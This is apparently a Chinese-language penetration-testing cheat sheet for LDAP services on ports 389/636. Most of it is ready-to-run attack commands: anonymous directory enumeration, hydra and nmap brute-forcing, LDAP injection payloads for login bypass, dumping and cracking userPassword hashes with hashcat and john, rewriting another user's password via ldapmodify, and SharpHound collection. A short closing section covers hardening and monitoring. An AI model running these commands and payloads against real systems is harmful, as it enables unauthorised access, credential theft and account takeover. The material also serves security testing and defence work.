389/636 - LDAP 服务渗透测试

# nmap 扫描
nmap -sV --script ldap-rootdse -p 389 TARGET
nmap -sV --script ldap-search -p 389 TARGET

# ldapsearch 匿名绑定
ldapsearch -x -H ldap://TARGET -b "" -s base "(objectclass=*)"

# 获取支持的控制
ldapsearch -x -H ldap://TARGET -b "" -s base "(objectclass=*)" supportedControls

# 匿名枚举
ldapsearch -x -H ldap://TARGET -b "dc=DOMAIN,dc=com" "(objectclass=*)"

# 枚举用户
ldapsearch -x -H ldap://TARGET -b "ou=users,dc=DOMAIN,dc=com" "(objectclass=person)"

# 枚举组
ldapsearch -x -H ldap://TARGET -b "ou=groups,dc=DOMAIN,dc=com" "(objectclass=groupOfNames)"

# 枚举计算机
ldapsearch -x -H ldap://TARGET -b "ou=computers,dc=DOMAIN,dc=com" "(objectclass=computer)"

# 暴力破解
hydra -l admin -P passwords.txt ldap://TARGET

# 枚举用户名
ldapsearch -x -H ldap://TARGET -b "dc=DOMAIN,dc=com" "(uid=*)"

# 使用已知凭据
ldapsearch -x -H ldap://TARGET -D "cn=admin,dc=DOMAIN,dc=com" -W -b "dc=DOMAIN,dc=com"

# 常见 Payload
*)(&(          # 绕过过滤
)(uid=*))(|    # 返回所有用户
admin*)(uid=*  # 前缀匹配
*))(uid=*))((  # 复杂绕过

# 登录绕过
# 原始查询：(&(uid=USERNAME)(password=PASSWORD))
# 注入后：(&(uid=admin*)(password=*))
# 或：(&(uid=admin)(|(password=*))

# 盲注
# 基于响应时间/长度判断
(uid=a*)  # 如果存在以 a 开头的用户，返回结果

# 1. 测试注入点
ldapsearch -x -H ldap://TARGET -b "dc=DOMAIN,dc=com" "(&(uid=admin*)(objectclass=*))"

# 2. 枚举用户
ldapsearch -x -H ldap://TARGET -b "dc=DOMAIN,dc=com" "(&(uid=a*)(objectclass=person))"
ldapsearch -x -H ldap://TARGET -b "dc=DOMAIN,dc=com" "(&(uid=b*)(objectclass=person))"

# 3. 提取属性
ldapsearch -x -H ldap://TARGET -b "dc=DOMAIN,dc=com" "(&(uid=admin)(objectclass=*))" mail telephone

# 枚举所有对象
ldapsearch -x -H ldap://TARGET -b "dc=DOMAIN,dc=com" "(objectclass=*)"

# 提取用户信息
ldapsearch -x -H ldap://TARGET -b "ou=users,dc=DOMAIN,dc=com" "(objectclass=person)" uid mail telephone userPassword

# 提取组信息
ldapsearch -x -H ldap://TARGET -b "ou=groups,dc=DOMAIN,dc=com" "(objectclass=groupOfNames)" cn member

# 提取密码哈希 (如果可访问)
ldapsearch -x -H ldap://TARGET -b "dc=DOMAIN,dc=com" "(objectclass=person)" userPassword

# 提取密码哈希
ldapsearch -x -H ldap://TARGET -b "dc=DOMAIN,dc=com" "(objectclass=person)" uid userPassword

# 输出格式
# userPassword: {SSHA}base64_encoded_hash

# 转换格式
python3 ldap2hashcat.py hashes.txt

# 爆破
hashcat -m 12200 hashes.txt rockyou.txt
john --format=ldap userPassword.txt

# 1. 枚举 ACL
ldapsearch -x -H ldap://TARGET -b "dc=DOMAIN,dc=com" "(objectclass=acl)"

# 2. 查找宽松 ACL
# 允许匿名读取
# 允许任意用户写入

# 3. 修改属性 (如果可写)
ldapmodify -x -H ldap://TARGET -D "cn=user,dc=DOMAIN,dc=com" -W << EOF
dn: cn=target,ou=users,dc=DOMAIN,dc=com
replace: userPassword
userPassword: NEW_PASSWORD
EOF

# 枚举域控
ldapsearch -x -H ldap://TARGET -b "dc=DOMAIN,dc=com" "(objectclass=domainController)"

# 枚举 GPO
ldapsearch -x -H ldap://TARGET -b "cn=policies,cn=system,dc=DOMAIN,dc=com" "(objectclass=groupPolicyContainer)" displayName

# 枚举 OU
ldapsearch -x -H ldap://TARGET -b "dc=DOMAIN,dc=com" "(objectclass=organizationalUnit)"

# 枚举信任关系
ldapsearch -x -H ldap://TARGET -b "dc=DOMAIN,dc=com" "(objectclass=trustedDomain)"

# 1. 测试匿名绑定
ldapsearch -x -H ldap://TARGET -b "" -s base

# 2. 枚举默认命名上下文
# 输出：defaultNamingContext: dc=COMPANY,dc=com

# 3. 枚举所有用户
ldapsearch -x -H ldap://TARGET -b "dc=COMPANY,dc=com" "(objectclass=person)" uid mail cn

# 4. 输出
# uid: john.doe
# mail: [email protected]
# cn: John Doe

# 5. 用于钓鱼或暴力破解

# Web 应用登录表单
# 输入：admin*)(|(
# 查询变为：(&(uid=admin*)(|(password=*))
# 条件恒真，登录成功

# 或使用 Burp Suite
# 拦截登录请求
# 修改 username 参数为：admin*)(|(
# 转发请求
# 登录成功

# 1. 提取所有用户哈希
ldapsearch -x -H ldap://TARGET -b "dc=DOMAIN,dc=com" "(objectclass=person)" uid userPassword > hashes.txt

# 2. 提取哈希
grep "userPassword:" hashes.txt | cut -d' ' -f2 > passwords.txt

# 3. 转换格式
python3 ldap2hashcat.py passwords.txt

# 4. 爆破
hashcat -m 12200 hashes_hashcat.txt rockyou.txt

# 5. 成功破解
# admin:Password123!
# user1:welcome1

# 1. 枚举域信息
ldapsearch -x -H ldap://DC_IP -b "dc=DOMAIN,dc=com" "(objectclass=domain)"

# 2. 枚举用户
ldapsearch -x -H ldap://DC_IP -b "dc=DOMAIN,dc=com" "(objectclass=user)" sAMAccountName mail

# 3. 枚举组
ldapsearch -x -H ldap://DC_IP -b "dc=DOMAIN,dc=com" "(objectclass=group)" cn member

# 4. 枚举计算机
ldapsearch -x -H ldap://DC_IP -b "dc=DOMAIN,dc=com" "(objectclass=computer)" cn

# 5. 枚举 GPO
ldapsearch -x -H ldap://DC_IP -b "cn=policies,cn=system,dc=DOMAIN,dc=com" "(objectclass=groupPolicyContainer)"

# 6. 绘制 AD 结构图

# 匿名搜索
ldapsearch -x -H ldap://TARGET -b "dc=DOMAIN,dc=com" "(objectclass=*)"

# 认证搜索
ldapsearch -x -H ldap://TARGET -D "cn=admin,dc=DOMAIN,dc=com" -W -b "dc=DOMAIN,dc=com" "(objectclass=*)"

# 特定属性
ldapsearch -x -H ldap://TARGET -b "dc=DOMAIN,dc=com" "(uid=admin)" mail telephone

# 导出 LDIF
ldapsearch -x -H ldap://TARGET -b "dc=DOMAIN,dc=com" -l 0 -a always > dump.ldif

# LDAP 根 DSE
nmap --script ldap-rootdse -p 389 TARGET

# LDAP 搜索
nmap --script ldap-search --script-args 'ldap.username=admin,ldap.password=pass,ldap.qbase="dc=DOMAIN,dc=com"' -p 389 TARGET

# LDAP 暴力破解
nmap --script ldap-brute -p 389 TARGET

# LDAP 查询漏洞
nmap --script ldap-novell-getpass -p 389 TARGET

# GUI LDAP 浏览器
# 1. 连接服务器
# 2. 浏览目录树
# 3. 搜索对象
# 4. 导出 LDIF

# AD 关系图工具
# 1. 收集数据
Sharphound.exe -c All

# 2. 导入 Neo4j
# 3. 查询攻击路径
# - 查找域管理员路径
# - 查找 Kerberoast 用户
# - 查找 ACL 滥用

# 1. 禁用匿名绑定
# OpenLDAP: slapd.conf
disallow bind_anon

# 2. 强制 LDAPS
# 仅允许加密连接
olcSecurity: tls=1

# 3. 配置 ACL
# 限制敏感属性访问
access to attrs=userPassword
    by dn="cn=admin,dc=DOMAIN,dc=com" write
    by anonymous auth
    by self write
    by * none

# 4. 密码策略
# 最小长度
# 复杂度要求
# 定期更换

# 1. 防火墙规则
# 仅允许必要 IP 访问 389/636
iptables -A INPUT -p tcp --dport 389 -s 192.168.1.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 389 -j DROP

# 2. VLAN 隔离
# LDAP 流量单独 VLAN

# 3. 使用 LDAPS
# 强制加密通信

# 1. 日志监控
# 大量查询请求
# 匿名绑定尝试
# 认证失败

# 2. 流量分析
tshark -i eth0 -Y "ldap" -T fields -e ldap.query

# 3. 告警规则
# 单 IP 高频查询
# 敏感属性访问
# 异常时间访问